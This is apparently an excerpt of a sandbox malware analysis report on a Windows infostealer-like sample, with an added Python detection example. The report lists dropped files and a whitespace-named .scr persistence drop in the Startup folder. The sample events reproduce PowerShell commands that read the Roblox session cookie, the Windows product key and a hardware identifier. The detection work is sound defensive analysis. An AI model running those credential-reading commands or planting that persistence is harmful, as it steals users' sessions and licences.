              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\select.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_queue.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_socket.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\libcrypto-3.dll
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_sqlite3.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\python312.dll
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\sqlite3.dll
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
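The command lines listed under Data Obfuscation and the file paths in this section correspond to three of the Sigma-style detections in the summary: PowerShell reading .ROBLOSECURITY, BackupProductKeyDefault and PROCESSOR_IDENTIFIER with Get-ItemPropertyValue; csc.exe spawned by PowerShell on a response file under the user's Local\Temp; and a whitespace-named .scr dropped into the all-users Startup folder. The Python below is an added example and not part of the report: it runs those three checks over constructed Sysmon-style process-creation and file-creation events (field names ParentImage, Image, CommandLine, TargetFilename) that reproduce the report's command lines alongside benign controls. The rule names, tags and event records are this example's own; nothing here was captured from the sandbox run.

```python
"""Three detections for behaviour listed in this report, run over constructed
Sysmon-style events.

Added example, not code from the report.  The event records, rule names and
tags are this example's own; the command lines and the Startup-folder path
reproduce what the report lists.
"""
import ntpath
import re

# Registry values the sample reads via Get-ItemPropertyValue, and what they are.
SENSITIVE_VALUES = {
    ".ROBLOSECURITY": "roblox-session-cookie",
    "BackupProductKeyDefault": "windows-product-key",
    "PROCESSOR_IDENTIFIER": "hardware-fingerprint",
}
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# csc.exe response file (@file.cmdline) living under a user's Local\Temp.
TEMP_CMDLINE_RE = re.compile(
    r'@"?[A-Za-z]:\\Users\\[^"]*\\AppData\\Local\\Temp\\[^"]*\.cmdline', re.IGNORECASE)


def _image_name(path):
    return ntpath.basename(path or "").lower()


def rule_registry_harvest(ev):
    """PowerShell reading a credential, licence or fingerprint value."""
    if ev.get("EventType") != "ProcessCreate" or _image_name(ev["Image"]) != "powershell.exe":
        return None
    cmd = ev["CommandLine"].lower()
    if "get-itempropertyvalue" not in cmd:
        return None
    hits = sorted(tag for name, tag in SENSITIVE_VALUES.items() if name.lower() in cmd)
    return ("powershell_sensitive_registry_read", ",".join(hits)) if hits else None


def rule_csc_from_temp(ev):
    """PowerShell spawning the C# compiler on a response file under Local\\Temp
    (Add-Type with inline source compiles this way)."""
    if ev.get("EventType") != "ProcessCreate" or _image_name(ev["Image"]) != "csc.exe":
        return None
    if _image_name(ev.get("ParentImage")) not in {"powershell.exe", "pwsh.exe"}:
        return None
    m = TEMP_CMDLINE_RE.search(ev["CommandLine"])
    return ("dotnet_compiler_from_temp", m.group(0)) if m else None


def rule_startup_folder_drop(ev):
    """A .scr, or a file whose name is only whitespace, created in a Startup folder."""
    if ev.get("EventType") != "FileCreate" or not STARTUP_DIR_RE.search(ev["TargetFilename"]):
        return None
    stem, ext = ntpath.splitext(ntpath.basename(ev["TargetFilename"]))
    if ext.lower() == ".scr":
        return ("startup_folder_persistence", "screensaver-extension:%r" % stem)
    if not stem.strip():
        return ("startup_folder_persistence", "whitespace-only-name:%r" % stem)
    return None


RULES = (rule_registry_harvest, rule_csc_from_temp, rule_startup_folder_drop)


def triage(events):
    """Return (rule_name, detail, event_index) for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((hit[0], hit[1], i))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
# Constructed events: five reproducing the report, three benign controls.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "ParentImage": CMD, "Image": PS,
     "CommandLine": r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"},
    {"EventType": "ProcessCreate", "ParentImage": CMD, "Image": PS,
     "CommandLine": r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"},
    {"EventType": "ProcessCreate", "ParentImage": CMD, "Image": PS,
     "CommandLine": r"powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"},
    {"EventType": "ProcessCreate", "ParentImage": PS, "Image": CSC,
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"'},
    {"EventType": "FileCreate", "Image": r"C:\Users\user\Desktop\X9g8L63QGs.exe",
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"},
    {"EventType": "ProcessCreate", "ParentImage": CMD, "Image": PS,
     "CommandLine": r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"},
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Program Files\dotnet\MSBuild.exe", "Image": CSC,
     "CommandLine": r'csc.exe /noconfig @"C:\src\app\obj\Release\app.cmdline"'},
    {"EventType": "FileCreate", "Image": r"C:\Program Files\Microsoft OneDrive\OneDriveSetup.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk"},
]

if __name__ == "__main__":
    for name, detail, idx in triage(SAMPLE_EVENTS):
        print(f"[{idx}] {name}: {detail}")
```

The registry rule keys on the value name rather than the hive path because the sample queries the same value under both HKCU and HKLM; the csc rule requires a PowerShell parent so that build servers compiling from a project directory stay quiet; the Startup rule fires on the .scr extension first and on a whitespace-only stem second, so a file named " .scr" is reported once.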

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C2665820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,4_2_00007FF7C2665820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
